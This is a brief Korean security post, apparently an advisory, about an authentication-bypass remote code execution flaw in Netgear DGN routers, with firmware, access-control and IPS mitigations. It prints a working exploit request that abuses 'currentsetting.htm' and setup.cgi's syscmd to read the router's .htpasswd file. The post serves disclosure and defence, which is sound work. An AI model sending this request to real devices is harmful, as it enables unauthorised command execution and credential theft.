loading
본문으로 바로가기

넷기어 DGN은 국내의 가장에서 사용하는 iptime과 같은 와이파이 모뎀입니다. 
해당 Netgear 모델에서 원격 코드 실행 취약점이 존재하였습니다. 

 


Netgear 라우터에 액세스를 시도하면 다음과 같은 인증 페이지가 노출됩니다. 

 


그리고 인증절차가 올바르지 않으면 액세스 거부를 하게 됩니다. 

하지만, 'currentsetting.htm'을 통해 인증 메커니즘을 무시하고 장치의 컨텍스트 내에서 명령을 실행할 수 있게 됩니다.

 

1. Payload

www.example.com/setup.cgi?currentsetting.htm=1

 

2. 공격구문

setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd = cat + / www / .htpasswd & amp;curpath = / & amp; currentsetting.htm = 1

currentsetting.htm URI에 포함되어 있을 시에, 인증 검사를 거치지 않고 다음과 같은 syscmd 명령어 실행이 가능하게 된다. 

 

 

※ 해결방안

1. 해당 벤더사가 제공하는 최신의 펌웨어를 설치한다. 

www.netgear.com/support/product/dgn1000.aspx#download

 

DGN1000 – Wireless-N Router with Built-in DSL Modem

DGN1000 – Wireless-N Router with Built-in DSL Modem

www.netgear.com

2. 승인되지 않은 자의 라우터 웹서비스 접근을 차단한다. 

3. IPS 에서는 아래의 패턴으로 대응 가능하다. 

[IPS WEBCGI] : 5964, NETGEAR DGN setup.cgi RCE

 

4. Snort 룰은 SecureCAST에서 확인이 가능하다.